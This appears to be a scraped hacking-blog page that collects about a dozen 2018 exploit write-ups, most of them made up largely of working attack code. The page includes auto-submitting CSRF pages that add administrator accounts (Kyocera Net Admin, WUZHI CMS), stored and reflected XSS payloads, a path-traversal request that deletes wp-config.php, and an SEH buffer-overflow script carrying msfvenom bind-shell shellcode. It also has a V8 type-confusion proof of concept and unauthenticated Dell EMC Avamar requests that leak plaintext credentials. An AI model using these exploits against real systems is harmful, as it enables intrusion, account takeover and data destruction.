# Exploit Title: Plugin Buddypress Xprofile Custom Fields Type 2.6.3 RCE – Unlink
# Date: 08/04/2018
# Exploit Author: Lenon Leite
# Vendor Homepage:
# https://wordpress.org/plugins/buddypress-xprofile-custom-fields-type/
# Software Link:
# https://wordpress.org/plugins/buddypress-xprofile-custom-fields-type/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 2.6.3
# Tested on: Ubuntu 16.1
#
#Article:
#http://lenonleite.com.br/publish-exploits/plugin-buddypress-xprofile-custom-fields-type-2-6-3-rce-unlink/
#
#Video:
#https://www.youtube.com/watch?v=By7kT7UbHVk
#
1 - Description
- Type user access: any user registered used in BuddyPress.
- $_POST[ 'field_' . $field_id . '_hiddenfile' ] is not escaped.
- $_POST[ 'field_' . $field_id . '_deleteimg' ] is not escaped.
2. Proof of Concept
Login as regular user.
1- Log in with BuddyPress User
2 - Access Edit Profile:
http://target/members/admin/profile/edit/
3 - Register data with image:
<http://target/wp-content/uploads/2018/01/buddypress-profile.png>4
- Change parameter to delete image in html and save profile:
<http://target/wp-content/uploads/2018/01/buddypress-profile2.png>
<http://target/wp-content/uploads/2018/01/buddypress-profile3-1.png>
#--
#*Atenciosamente*
#
#*Lenon Leite*
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863567025
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#Vendor: KYOCERA Corporation
#Product https://global.kyocera.com
#Affected version: 3.4.0906
#
#Summary: KYOCERA Net Admin is Kyocera's unified
#device management software that uses a web-based
#platform to give network administrators easy and
#uncomplicated control to handle a fleet for up to
#10,000 devices. Tasks that used to require multiple
#programs or walking to each printer can now be
#accomplished in a single, fast and modern environment.
#
#Desc: The application interface allows users to perform
#certain actions via HTTP requests without performing
#any validity checks to verify the requests. This can
#be exploited to perform certain actions with administrative
#privileges if a logged-in user visits a malicious web
#site.
#
#Tested on: Microsoft Windows 7 Professional SP1 (EN)
#Apache Tomcat/8.5.15
#
#
#Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#@zeroscience
#
#
#Advisory ID: ZSL-2018-5458
#Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5458.php
<html>
<head>
<title>KYOCERA Net Admin 3.4 CSRF Add Admin Exploit</title>
</head>
<body onload="exploitrun();">
<!-- Add Administrator -->
<form name="create_user" action="https://192.168.18.133:7443/fwk-web/jsp/addUser.faces" method="POST" target="frame0">
<input type="hidden" name="userType" value="0" />
<input type="hidden" name="addUserForm:loginName" value="backdoor" />
<input type="hidden" name="addUserForm:pw" value="pass123" />
<input type="hidden" name="addUserForm:pwConfirm" value="pass123" />
<input type="hidden" name="addUserForm:role" value="administrator" />
<input type="hidden" name="addUserForm:required_name" value="name" />
<input type="hidden" name="addUserForm:required_email1" value="bd@db.ee" />
<input type="hidden" name="addUserForm:required_role" value="administrator" />
<input type="hidden" name="addUserForm:optional_name" value="Backdoor" />
<input type="hidden" name="addUserForm:company" value="ZSL" />
<input type="hidden" name="addUserForm:department" value="forensics" />
<input type="hidden" name="addUserForm:email2" value="bd2@db.ee" />
<input type="hidden" name="addUserForm:optional_phone" value="123-123-1234" />
<input type="hidden" name="addUserForm:optional_cell" value="321-321-3210" />
<input type="hidden" name="addUserForm:submitHidden" value="true" />
<input type="hidden" name="addUserForm_SUBMIT" value="1" />
<input type="hidden" name="addUserForm:_link_hidden_" value="" />
</form>
<!-- Update Node -->
<form name="update_node" action="https://192.168.18.133:7443/fwk-web/servlet/EventControllerServlet" method="GET" target="frame1">
<input type="hidden" name="bname" value="" />
<input type="hidden" name="ts" value="1522690965730" />
<input type="hidden" name="cmd" value="tv_set_cur_node" />
<input type="hidden" name="node_id" value="root.user_administration.administrator.backdoor" />
</form>
<iframe name="frame0"></iframe>
<iframe name="frame1"></iframe>
<script>
function exploitrun()
{
document.create_user.submit();
document.getElementsByTagName("iframe")[0].onload = function()
{
document.update_node.submit();
document.getElementsByTagName("iframe")[1].onload = function()
}
}
</script>
</body>
</html>
# Exploit Title: iScripts Easycreate 3.2.1 - Stored Cross-Site Scripting
# Date: 02/04/2018
# Exploit Author: ManhNho
# Vendor Homepage: https://www.iscripts.com
# Demo Page: https://www.demo.iscripts.com/easycreate/demo/
# Version: 3.2.1
# Tested on: Windows 10
# Category: Webapps
# CVE: CVE-2018-9236
# CVE: CVE-2018-9237
1. Description
====================
iScripts EasyCreate 3.2.1 has Stored Cross-Site Scripting in the "Site Description" and "Site Title" fields.
2. PoC
====================
1. from "user section", access to "dashboard" and select "Created from saved items" with edit option
2. In "edit site" action, Inject "><script>alert('2')</script> to "Site Description" field
3. Save and change!! refresh and we have alert pop up!
3. PoC
====================
1. from "user section", access to "dashboard" and select "Created from saved items" with edit option
2. In "edit site" action, Inject </title>"><script>alert('1')</script> to "Site title" field
3. Save and change! refresh and we have alert pop up!
4. References
====================
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-9237
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-9236
# Exploit Title: iScripts SonicBB 1.0 - Reflected Cross-Site Scripting
# Date: 02/04/2018
# Exploit Author: ManhNho
# Vendor Homepage: https://www.iscripts.com
# Demo Page: https://www.demo.iscripts.com/sonicbb/demo/
# Version: 1.0
# Tested on: Windows 10
# Category: Webapps
# CVE: CVE-2018-9235
1. Description
====================
iScripts SonicBB 1.0 has Reflected Cross-Site Scripting via the query
parameter to search.php
2. PoC
====================
Request:
GET
/sonicbb/demo/search.php?query=%22%3E%3Cscript%3Ealert%28%271%27%29%3C%2Fscript%3E
HTTP/1.1
Host: www.demo.iscripts.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0)
Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=227100805.298811387.1522637403.1522637403.1522637403.1;
__utmb=227100805; __utmc=227100805;
__utmz=227100805.1522637403.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none);
PHPSESSID=grh7l3amrvhoapig8ll268l9o4;
messagesUtk=9ae2fcc5306f4d9c8d433f0f58efb968; hs-messages-is-open=false
Connection: close
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 200 OK
Date: Mon, 02 Apr 2018 02:58:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 3619
...
<tr>
<td width="76%" class="alt1"><a href="index.php">iScripts Forum</a> ->
<a href="search.php?query="><script>alert('1')</script>">Search</a></td>
<td width="24%" align="center" class="alt1">
<form method="GET" action="search.php" style="display: inline">
<input type="text" name="query" size="12" style="font-size: 10px">
<input type="submit" value="Search" style="font-size: 10px">
</form>
</td>
</tr>
...
3. References
====================
https://pastebin.com/caQW37fY
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-9235
######################################################
# Exploit Title: Buffer Overflow on DVD X Player Standard 5.5.3.9
# Date: 29.03.2018
# Vendor Homepage: http://www.dvd-x-player.com
# Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup-
# Standard.exe
# Category: Local (SEH Based)
# Exploit Credit: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Version: 5.5.3.9
# Tested on: Windows XP SP3 x86
# CVE: CVE-2018-9128
######################################################
# root@PKP:~# msfvenom -p windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 -b "\x00\x0a\x0d\x1a" -f python
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from the payload
# x86/shikata_ga_nai chosen with final size 355
# Payload size: 355 bytes
# Final size of python file: 1710 bytes
file = open("exploit_dvdx_player_standard_5.5.3.9.plf","w")
buffer = "\x41" * 608
next_seh = "\xeb\x06\x90\x90"
seh = "\xBC\x13\x5F\x02" # pop/pop/ret : EchoDelayProcess.dll
nops = "\x90" * 100
buf = ""
buf += "\xda\xd4\xd9\x74\x24\xf4\xb8\xb3\xb9\xc8\xae\x5a\x31"
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x13\x03\xf1\xaa\x2a"
buf += "\x5b\x09\x24\x28\xa4\xf1\xb5\x4d\x2c\x14\x84\x4d\x4a"
buf += "\x5d\xb7\x7d\x18\x33\x34\xf5\x4c\xa7\xcf\x7b\x59\xc8"
buf += "\x78\x31\xbf\xe7\x79\x6a\x83\x66\xfa\x71\xd0\x48\xc3"
buf += "\xb9\x25\x89\x04\xa7\xc4\xdb\xdd\xa3\x7b\xcb\x6a\xf9"
buf += "\x47\x60\x20\xef\xcf\x95\xf1\x0e\xe1\x08\x89\x48\x21"
buf += "\xab\x5e\xe1\x68\xb3\x83\xcc\x23\x48\x77\xba\xb5\x98"
buf += "\x49\x43\x19\xe5\x65\xb6\x63\x22\x41\x29\x16\x5a\xb1"
buf += "\xd4\x21\x99\xcb\x02\xa7\x39\x6b\xc0\x1f\xe5\x8d\x05"
buf += "\xf9\x6e\x81\xe2\x8d\x28\x86\xf5\x42\x43\xb2\x7e\x65"
buf += "\x83\x32\xc4\x42\x07\x1e\x9e\xeb\x1e\xfa\x71\x13\x40"
buf += "\xa5\x2e\xb1\x0b\x48\x3a\xc8\x56\x05\x8f\xe1\x68\xd5"
buf += "\x87\x72\x1b\xe7\x08\x29\xb3\x4b\xc0\xf7\x44\xab\xfb"
buf += "\x40\xda\x52\x04\xb1\xf3\x90\x50\xe1\x6b\x30\xd9\x6a"
buf += "\x6b\xbd\x0c\x06\x63\x18\xff\x35\x8e\xda\xaf\xf9\x20"
buf += "\xb3\xa5\xf5\x1f\xa3\xc5\xdf\x08\x4c\x38\xe0\x32\x5f"
buf += "\xb5\x06\x50\x4f\x90\x91\xcc\xad\xc7\x29\x6b\xcd\x2d"
buf += "\x02\x1b\x86\x27\x95\x24\x17\x62\xb1\xb2\x9c\x61\x05"
buf += "\xa3\xa2\xaf\x2d\xb4\x35\x25\xbc\xf7\xa4\x3a\x95\x6f"
buf += "\x44\xa8\x72\x6f\x03\xd1\x2c\x38\x44\x27\x25\xac\x78"
buf += "\x1e\x9f\xd2\x80\xc6\xd8\x56\x5f\x3b\xe6\x57\x12\x07"
buf += "\xcc\x47\xea\x88\x48\x33\xa2\xde\x06\xed\x04\x89\xe8"
buf += "\x47\xdf\x66\xa3\x0f\xa6\x44\x74\x49\xa7\x80\x02\xb5"
buf += "\x16\x7d\x53\xca\x97\xe9\x53\xb3\xc5\x89\x9c\x6e\x4e"
buf += "\xb7\x6d\xa2\x5b\x20\xd4\x57\x26\x2c\xe7\x82\x65\x49"
buf += "\x64\x26\x16\xae\x74\x43\x13\xea\x32\xb8\x69\x63\xd7"
buf += "\xbe\xde\x84\xf2"
file.write(buffer + next_seh + seh + nops + buf)
file.close()
# Exploit Title : Activity Log Wordpress Plugin Stored Cross Site Scripting (XSS)
# Date: 25-02-2018
# Exploit Author : Stefan Broeder
# Vendor Homepage: https://pojo.me
# Software Link: https://wordpress.org/plugins/aryo-activity-log/
# Version: 2.4.0
# CVE : CVE-2018-8729
# Category : webapps
Description
===========
Activity Log is a WordPress plugin which tracks site activity. It has more than 70.000 active installations. Version 2.4.0 (and possibly the previous ones) are affected by several Stored XSS vulnerabilities.
Vulnerable part of code
=======================
Storing the payload:
File: aryo-activity-log/hooks/class-aal-hook-attachment.php:14. The log entry that is stored contains the result of get_the_title($post->ID), which can include HTML and is not sanitized by WordPress.
File: aryo-activity-log/hooks/class-aal-hook-comments.php:14. The log entry that is stored contains the result of get_the_title($comment->comment_post_ID), which can include HTML and is not sanitized by WordPress.
File: aryo-activity-log/hooks/class-aal-hook-posts.php:7. The log entry that is stored contains the result of $title = get_the_title($post), which can include HTML and is not sanitized by WordPress.
Displaying the payload:
File: aryo-activity-log/classes/class-aal-activity-log-list-table.php:209. $item->object_name is displayed without sanitization and can contain HTML tags.
Impact
======
Arbitrary JavaScript code can be run on browser side if a user is able to create a post or upload an attachment.
Exploitation
============
To successfully exploit this vulnerability, an attacker would have to perform any of the following:
- Create/edit/draft/publish/trash/untrash a post with JavaScript in the title
- Create/edit/trash/untrash/mark_as_spam/unmark_as_spam a comment on a post with JavaScript in the title
- Add/edit/delete an attachment with JavaScript in the attachment title
Regular website visitors will not have the capability to do any of these, however, possible threat actors might include:
- A user with the role of ‘editor’ within WordPress (non-admins which are able to create content)
- A rogue administrator among multiple administrators
- A compromised plugin
If the payload has been injected, then it will be executed once the Activity Log is viewed. This can possibly lead to stealing of CSRF nonces and creation of new (administrator) users on the WordPress instance.
Solution
========
Update to 2.4.1
# Exploit Title: Plugin Google Drive for WordPress 2.2 – RCE – Unlik
# Date: 08/04/2018
# Exploit Author: Lenon Leite
# Vendor Homepage: *https://wordpress.org/plugins/wp-google-drive/
# Software Link: *https://wordpress.org/plugins/wp-google-drive/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 2.2
# Tested on: Ubuntu 16.1
1 - Description
- Type user access: Don't need of login .
- $_POST[‘file_name’] is not escaped.
2. Proof of Concept
1 - Send data form:
<form method="post"
action="http://target/wp-content/plugins/wp-google-drive/gdrive-ajaxs.php">
<input type="text" name="ajaxstype" value="del_fl_bkp">
<input type="text" name="file_name" value="../../wp-config.php">
<input type="text" name="id" value="1">
<input type="submit">
</form>
# - Date Discovery : *11/25/2017*
# - Date Vendor Contact : *12/26/2017*
# - Date Publish : 08/04/2018
# - Date Resolution :
# Exploit Title: WUZHI CMS 4.1.0 CSRF vulnerability add admin account
# Date: 2018-04-10
# Exploit Author: taoge
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
# Software Link: https://github.com/wuzhicms/wuzhicms
# Version: 4.1.0
# CVE : CVE-2018-9926
An issue was discovered in WUZHI CMS 4.1.0.(https://github.com/wuzhicms/wuzhicms/issues/128)
There is a CSRF vulnerability that can add an admin account via index.php?m=core&f=power&v=add.
After the administrator logged in, open the csrf exp page.
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;
fields += "<input type='hidden' name='form[role][]' value='1' />";
fields += "<input type='hidden' name='form[username]' value='hack123' />";
fields += "<input type='hidden' name='form[password]' value='' />";
fields += "<input type='hidden' name='form[truename]' value='taoge@5ecurity' />";
var url = "http://127.0.0.1/www/index.php?m=core&f=power&v=add&&_su=wuzhicms&_menuid=61&_submenuid=62&submit=taoge";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>
/*
I think this commit has introduced the bug: https://chromium.googlesource.com/v8/v8.git/+/9884bc5dee488bf206655f07b8a487afef4ded9b
Reduction LoadElimination::ReduceTransitionElementsKind(Node* node) {
...
if (object_maps.contains(ZoneHandleSet<Map>(source_map))) {
object_maps.remove(source_map, zone());
object_maps.insert(target_map, zone());
- AliasStateInfo alias_info(state, object, source_map);
- state = state->KillMaps(alias_info, zone());
- state = state->AddMaps(object, object_maps, zone());
+ state = state->SetMaps(object, object_maps, zone());
}
...
}
I think the "state->KillMaps(alias_info, zone());" was accidentally removed. This lack may lead CheckMap instructions to be removed incorrectly.
A PoC demonstrating type confusion:
*/
function opt(a, b) {
b[0] = 0;
a.length;
// TransitionElementsKind
for (let i = 0; i < 1; i++)
a[0] = 0;
// CheckMap removed, type confusion
b[0] = 9.431092e-317; // 0x1234567
}
let arr1 = new Array(1);
arr1[0] = 'a';
opt(arr1, [0]);
let arr2 = [0.1];
opt(arr2, arr2);
%OptimizeFunctionOnNextCall(opt);
opt(arr2, arr2);
arr2[0].x // access 0x1234566
Without natives syntax:
function opt(a, b) {
b[0] = 0;
a.length;
// TransitionElementsKind
for (let i = 0; i < 1; i++)
a[0] = 0;
b[0] = 9.431092e-317; // 0x1234567
// Force optimization
for (let i = 0; i < 10000000; i++) {
}
}
let arr1 = new Array(1);
arr1[0] = 'a';
opt(arr1, [0]);
let arr2 = [0.1];
opt(arr2, arr2);
opt(arr2, arr2);
arr2[0].x // access 0x1234566
# Exploit Title: [Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability (DSA-2018-025)]
# Date: [24/11/2017]
# Exploit Author: [SlidingWindow]
# Vendor Homepage: [https://store.Dell EMC.com/en-us/AVAMAR-PRODUCTS/Dell-DELL EMC-Avamar-Virtual-Edition-Data-Protection-Software/p/DELL EMC-Avamar-Virtual-Edition]
# Version: [Dell EMC Avamar Server 7.3.1 , Dell EMC Avamar Server 7.4.1, Dell EMC Avamar Server 7.5.0, Dell EMC Integrated Data Protection Appliance 2.0, Dell EMC Integrated Data Protection Appliance 2.1]
# Tested on: [Dell EMC Avamar Virtual Edition version 7.5.0.183]
# CVE : [CVE-2018-1217]
==================
#Product:-
==================
EMC Avamar Virtual Edition is great for enterprise backup data protection for small and medium sized offices. EMC Avamar Virtual Edition is optimized for backup and recovery of virtual and physical servers,enterprise applications,remote offices,and desktops or laptops.
==================
#Vulnerability:-
==================
Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability (DSA-2018-025)
========================
#Vulnerability Details:-
========================
=====================================================================================================================================================
1. Missing functional level access control allows an unauthenticated user to add DELL EMC Support Account to the Installation Manager (CVE-2018-1217)
=====================================================================================================================================================
DELL EMC Avamar fails to restrict access to Configuration section that let Administrators set up Installation Manager configurations, or check for new packages from the Online Support site. An unauthenticated, remote attacker could add an Online Support Account for DELL EMC without any user interaction.
#Proof-Of-Concept:
------------------
1. Send following request to the target:
POST /avi/avigui/avigwt HTTP/1.1
Host: <target_ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Permutation: 8EGHBE4312AFBC12325324123DF4545A
X-GWT-Module-Base: https://<target_ip>/avi/avigui/
Referer: https://<target_ip>/avi/avigui.html
Content-Length: 452
Connection: close
7|0|7|https://<target_ip>/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|saveLDLSConfig|java.lang.String/2004016611|<target_ip>|{"proxyHost":null, "proxyPort":0, "useProxyAuthentication":false, "proxyUsername":null, "proxyPassword":null, "disableInternetAccess":false, "proxyEnable":false, "emcsupportUsername":"hacker", "emcsupportPassword":"hacked3", "disableLDLS":false}|1|2|3|4|3|5|5|5|6|0|7|
2. Log into Avamar Installation Manager and navigate to Configuration tab to make sure that the user 'hacker' was added successfully.
=========================================================================================================================================================
2. Missing functional level access control allows an unauthenticated user to retrieve DELL EMC Support Account Credentials in Plain Text (CVE-2018-1217)
=========================================================================================================================================================
DELL EMC Avamar fails to restrict access to Configuration section that let Administrators set up Installation Manager configurations, or check for new packages from the Online Support site. An unauthenticated, remote attacker could retrieve Online Support Account password in plain text.
#Proof-Of-Concept:
------------------
1. Send following request to the target:
POST /avi/avigui/avigwt HTTP/1.1
Host: <target_ip>
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Permutation: 3AF662C052F0EB9D3D51649D2293F6EC
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
DNT: 1
Content-Length: 192
7|0|6|https://<target_ip>/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|getLDLSConfig|java.lang.String/2004016611|<target_ip>|1|2|3|4|2|5|5|6|0|
2. Server returns credentials in plain text:
HTTP/1.1 200 OK
Date: Fri, 17 Nov 2017 10:46:31 GMT
Server: Jetty(9.0.6.v20130930)
Content-Type: application/json; charset=utf-8
Content-Disposition: attachment
Content-Length: 275
Connection: close
//OK[1,["{\"proxyHost\":null,\"proxyPort\":0,\"useProxyAuthentication\":false,\"proxyUsername\":\"\",\"proxyPassword\":\"\",\"disableInternetAccess\":false,\"proxyEnable\":false,\"emcsupportUsername\":\"hacker\",\"emcsupportPassword\":\"hacked3\",\"disableLDLS\":false}"],0,7]
=========================================================================================================================================================
3. Improper validation of ëDELL EMC Customer Support passcodeí allows an authenticated user to unlock DELL EMC Support Account and download verbose logs
=========================================================================================================================================================
DELL EMC Avamar fails to validate ëDELL EMC Customer Support passcodeí properly allowing an authenticated user to unlock the support account and view/download verbose logs. However, according to vendor, this one seems to be a vulnerability but it's an ambuious functionality instead.
#Proof-Of-Concept:
------------------
1. Try to unlock the support account with an invalid password and you get error 'Customer Support Access Denied':
2. Now send the same request again (with invalid password) and tamper the server response:
Request:
---------
POST /avi/avigui/avigwt HTTP/1.1
Host: <target_ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Permutation: 3AF662C052F0EB9D3D51649D2293F6EC
X-GWT-Module-Base: https://<target_ip>/avi/avigui/
Referer: https://<target_ip>/avi/avigui.html
Content-Length: 202
Cookie: supo=x; JSESSIONID=9tt4unkdjjilbo072x4nji2y
Connection: close
7|0|7|https://<target_ip>/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|supportLogin|java.lang.String/2004016611|<target_ip>|1|2|3|4|3|5|5|5|6|0|7|
Tampered response:
--------------------
HTTP/1.1 200 OK
Date: Fri, 24Nov 2017 07:57:25 GMT
Server: Jetty(9.0.6.v20130930)
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Disposition: attachment
Content-Length: 21
Connection: close
//OK[1,["true"],0,7]
3. This unlocks the support account and enabled the 'Log' download button.
===================================
#Vulnerability Disclosure Timeline:
===================================
11/2017: First email to disclose the vulnerability to EMC Security Response Team.
12/2017: Vendor confirmed vulnerability#1 and vulnerability#3, and discarded vulnerability#3 stating that this is an ambigious functionaliy and not a vulnerability.
12/2017: Vendor confirmed that the fix will be released in January 2018.
01/2018: Vendor delayed the fix release stating that the Dell EMC IDPA is also vulnerable.0
04/2018: Vendor assigned CVE-2018-1217 and pubished the advisory 'DSA-2018-025: Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability': http://seclists.org/fulldisclosure/2018/Apr/14
# Exploit Title: WordPress Plugin WordPress File Upload 4.3.2 - Stored XSS
# Date: 31/03/2018
# Exploit Author: ManhNho
# Vendor Homepage: https://www.iptanus.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-file-upload.zip
# Version: 4.3.2
# Tested on: CentOS 6.5
# CVE : CVE-2018-9172
# Category : Webapps
1. Description
===========
WordPress File Upload is a WordPress plugin with more than 20.000 active
installations.
Version 4.3.2 (and possibly previous versions) are affected by a Stored XSS
vulnerability in the admin panel ,related to the "Uploader Instances"
functionality.
2. Proof of Concept
===========
1. Login to admin panel
2. Access to Wordpress File Upload Control Panel. In Uploader Instances
function, choose and edit created Instance
3. In Plugin ID field, inject XSS pattern such as:
<script>alert('ManhNho')</script> and click Update button
4. Access to Pages/Posts contain upload option, we got alert ManhNho
3. References
===========
https://www.iptanus.com/new-version-4-3-3-of-wordpress-file-upload-plugin/
https://wordpress.org/plugins/wp-file-upload/#developers
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9172
# Exploit Title: WUZHI CMS 4.1.0 CSRF vulnerability add user account
# Date: 2018-04-10
# Exploit Author: taoge
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
# Software Link: https://github.com/wuzhicms/wuzhicms
# Version: 4.1.0
# CVE : CVE-2018-9927
An issue was discovered in WUZHI CMS 4.1.0.(https://github.com/wuzhicms/wuzhicms/issues/128)
There is a CSRF vulnerability that can add a user account via index.php?m=member&f=index&v=add.
After the administrator logged in, open the csrf exp page.
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;
fields += "<input type='hidden' name='info[username]' value='hack123' />";
fields += "<input type='hidden' name='info[password]' value='hacktest' />";
fields += "<input type='hidden' name='info[pwdconfirm]' value='hacktest' />";
fields += "<input type='hidden' name='info[email]' value='taoge@5ecurity.cn' />";
fields += "<input type='hidden' name='info[mobile]' value='' />";
fields += "<input type='hidden' name='modelids[]' value='10' />";
fields += "<input type='hidden' name='info[groupid]' value='3' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='avatar' value='' />";
fields += "<input type='hidden' name='islock' value='0' />";
fields += "<input type='hidden' name='sys_name' value='0' />";
fields += "<input type='hidden' name='info[birthday]' value='' />";
fields += "<input type='hidden' name='info[truename]' value='' />";
fields += "<input type='hidden' name='info[sex]' value='0' />";
fields += "<input type='hidden' name='info[marriage]' value='0' />";
var url = "http://127.0.0.1/www/index.php?m=member&f=index&v=add&_su=wuzhicms&_menuid=30&_submenuid=74&submit=taoge";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>
# Exploit Title: WordPress Plugin WordPress File Upload 4.3.3 - Stored XSS
# Date: 06/04/2018
# Exploit Author: ManhNho
# Vendor Homepage: https://www.iptanus.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-file-upload.zip
# Version: 4.3.3
# Tested on: Windows 7 / Cent OS 6.5
# CVE : CVE-2018-9844
# Category : Webapps
Description
===========
WordPress File Upload is a WordPress plugin with more than 20.000 active
installations.
Version 4.3.3 (and possibly previous versions) are affected by a Stored XSS
vulnerability in the admin panel ,related to the "Edit_Setting"
functionality.
PoC
===============
Request:
POST /wp-admin/options-general.php?page=wordpress_file_upload&action=edit_settings
HTTP/1.1
Host: 192.168.1.66
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101
Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.66/wp-admin/options-general.php?page=
wordpress_file_upload&action=plugin_settings
Content-Type: multipart/form-data; boundary=---------------------
------27678165033834
Content-Length: 906
Cookie: wordpress_ce39b1fa1561a0e8d46e02ff9e65f6a0=admin%7C1523124759%
7CYpPsz6ePz7L52pKrUk6uFioJlynhadnrSuv2lKQNhJe%7Ca3c7a75afaaf9ce1db3596b8aa83
3adeb337f313ef5156fbf93096c1af0cdbbc; wp-settings-1=libraryContent%3Dbrowse;
wp-settings-time-1=1522504284; PHPSESSID=o6smfv1u6p8rh7cu7v7gl9lm47;
wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_
ce39b1fa1561a0e8d46e02ff9e65f6a0=admin%7C1523124759%
7CYpPsz6ePz7L52pKrUk6uFioJlynhadnrSuv2lKQNhJe%7C1993c93121805782b8bee82cd013
6f1a6aa286d4294ed58cb6f95539acdfe5d5
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------27678165033834
Content-Disposition: form-data; name="_wpnonce"
c9d5733e36
-----------------------------27678165033834
Content-Disposition: form-data; name="_wp_http_referer"
/wp-admin/options-general.php?page=wordpress_file_upload&
action=plugin_settings
-----------------------------27678165033834
Content-Disposition: form-data; name="action"
edit_settings
-----------------------------27678165033834
Content-Disposition: form-data; name="wfu_basedir"
<script>alert('XSS')</script>
-----------------------------27678165033834
Content-Disposition: form-data; name="wfu_postmethod"
fopen
-----------------------------27678165033834
Content-Disposition: form-data; name="wfu_admindomain"
siteurl
-----------------------------27678165033834
Content-Disposition: form-data; name="submitform"
Update
-----------------------------27678165033834--
Response:
HTTP/1.1 200 OK
Date: Thu, 05 Apr 2018 18:15:01 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28623
...
<input name="wfu_basedir" id="wfu_basedir" type="text"
value="<script>alert('XSS')</script>" />
<p style="cursor: text; font-size:9px; padding: 0px; margin: 0px; width:
95%; color: #AAAAAA;">Current value: <strong><script>alert('XSS')</
script></strong></p>
...
References
===============
https://www.iptanus.com/new-version-4-3-4-of-wordpress-file-upload-plugin/
https://wordpress.org/plugins/wp-file-upload/#developers
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9844
#!/usr/bin/env ruby
#
# [CVE-2018-7600] Drupal <= 8.5.0 / <= 8.4.5 / <= 8.3.8 / 7.23 <= 7.57 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/
#
# Authors:
# - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked
